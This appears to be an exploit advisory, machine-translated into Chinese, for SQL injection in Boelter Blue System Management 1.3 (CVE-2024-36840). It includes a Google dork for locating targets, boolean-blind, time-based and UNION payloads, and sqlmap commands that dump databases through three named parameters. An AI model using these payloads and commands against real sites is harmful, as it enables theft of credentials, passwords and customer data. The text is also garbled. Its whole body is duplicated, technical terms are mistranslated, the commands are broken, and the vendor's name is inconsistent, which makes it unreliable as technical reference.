#Boelter Blue System Management(版本1.3)中的SQL注入漏洞(版本1.3)
#google dork: inurl:'由boelter blue'
#日期: 2024-06-04
#利用作者: CBKB(DeadlyData,R4D1X)
#供应商homepage: https://www.boolterblue.com
#软件link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapphl=en_us
#版本: 1.3
#测试在: Linux Debian 9(拉伸),Apache 2.4.25,mysql=5.0.12
#CVE: CVE-2024-36840
##漏洞详细信息:
### Description:
在Boolter Blue System Management(版本1.3)中发现了多个SQL注入漏洞。这些漏洞使攻击者可以通过受影响的参数执行任意SQL命令。成功的开发可能会导致未经授权的访问,数据泄漏和帐户收购。
参数: ID(GET)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD: ID=10071和4036=4036
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=10071和(从(select(sleep(5)))ljod(select 4443)
type:联合查询
title:通用联盟查询(NULL)-44列
PAYLOAD: ID=-5819 UNION全部选择NULL,NULL,NULL,CONCAT(0x7170766b71,0x6466655514b7268617775444968656e4141414678595a6666666f7 7447A57515750476751524F5941496B55,0X71626A71),空,null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Nu,NU LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL- -
1。** news_details.php?id **参数:
sqlmap -u'https://www.example.com/news_details.php?id=10071' - random -agent - dbms=mysql -threads=4 -dbs
2。** services.php?部分**参数:
sqlmap -u'https://www.example.com/services.php?section=5081' - random -agent -tamper=space2comment -threads=8 -dbs
3。** location_details.php?id **参数:
sqlmap -u'https://www.example.com/location_details.php?id=836' - random -agent -dbms -dbms=mysql -dbs -dbs
Impact:
未经授权访问数据库。
提取敏感信息,例如管理凭据,用户电子邮件/密码,设备哈希,用户PII,购买历史记录和数据库凭据。
帐户收购和潜在的受影响申请的完全控制。
Discoverer(S)/Credits:
CBKB(DeadlyData,R4D1X)
参考文献:
#google dork: inurl:'由boelter blue'
#日期: 2024-06-04
#利用作者: CBKB(DeadlyData,R4D1X)
#供应商homepage: https://www.boolterblue.com
#软件link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapphl=en_us
#版本: 1.3
#测试在: Linux Debian 9(拉伸),Apache 2.4.25,mysql=5.0.12
#CVE: CVE-2024-36840
##漏洞详细信息:
### Description:
在Boolter Blue System Management(版本1.3)中发现了多个SQL注入漏洞。这些漏洞使攻击者可以通过受影响的参数执行任意SQL命令。成功的开发可能会导致未经授权的访问,数据泄漏和帐户收购。
参数: ID(GET)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD: ID=10071和4036=4036
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID=10071和(从(select(sleep(5)))ljod(select 4443)
type:联合查询
title:通用联盟查询(NULL)-44列
PAYLOAD: ID=-5819 UNION全部选择NULL,NULL,NULL,CONCAT(0x7170766b71,0x6466655514b7268617775444968656e4141414678595a6666666f7 7447A57515750476751524F5941496B55,0X71626A71),空,null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Nu,NU LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL- -
1。** news_details.php?id **参数:
sqlmap -u'https://www.example.com/news_details.php?id=10071' - random -agent - dbms=mysql -threads=4 -dbs
2。** services.php?部分**参数:
sqlmap -u'https://www.example.com/services.php?section=5081' - random -agent -tamper=space2comment -threads=8 -dbs
3。** location_details.php?id **参数:
sqlmap -u'https://www.example.com/location_details.php?id=836' - random -agent -dbms -dbms=mysql -dbs -dbs
Impact:
未经授权访问数据库。
提取敏感信息,例如管理凭据,用户电子邮件/密码,设备哈希,用户PII,购买历史记录和数据库凭据。
帐户收购和潜在的受影响申请的完全控制。
Discoverer(S)/Credits:
CBKB(DeadlyData,R4D1X)
参考文献:
正在加载...
infosec-db.github.io
正在加载...
cve.mitre.org